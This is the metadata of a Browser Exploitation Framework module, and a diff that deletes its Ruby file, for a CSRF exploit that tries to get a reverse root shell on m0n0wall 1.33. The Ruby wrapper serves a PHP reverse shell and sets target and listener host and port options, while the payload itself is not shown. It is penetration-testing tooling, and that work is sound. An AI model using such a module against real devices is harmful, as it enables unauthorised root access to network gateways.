description: "Attempts to get a reverse root shell on a m0n0wall 1.33<br />Vulnerablity found and PoC provided by Yann CAM @ Synetis.<br />For more information refer to <a href='http://www.exploit-db.com/exploits/23202/'>http://www.exploit-db.com/exploits/23202/</a><br />Patched in version 1.34.<br />This exploit make use of <a href='http://pentestmonkey.net/tools/web-shells/php-reverse-shell'>php-reverse-shell from Pentest Monkey</a>."
authors: ["bmantra"]
target:
working: ["ALL"]

27
modules/exploits/m0n0wall/module.rb
View File

@@ -1,27 +0,0 @@
#
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Monowall_reverse_root_shell_csrf < BeEF::Core::Command
def pre_send
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/exploits/m0n0wall/php-reverse-shell.php', '/php-reverse-shell', 'php')
end
def self.options
@configuration = BeEF::Core::Configuration.instance
lhost = @configuration.beef_host
lhost = '' if lhost == '0.0.0.0'
[
{ 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '192.168.1.1' },
{ 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '80' },
{ 'name' => 'lhost', 'ui_label' => 'Local Host', 'value' => lhost },
{ 'name' => 'lport', 'ui_label' => 'Local Port', 'value' => '4444' }
]
end
def post_execute
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('php-reverse-shell.php')
save({ 'result' => @datastore['result'] })
end
end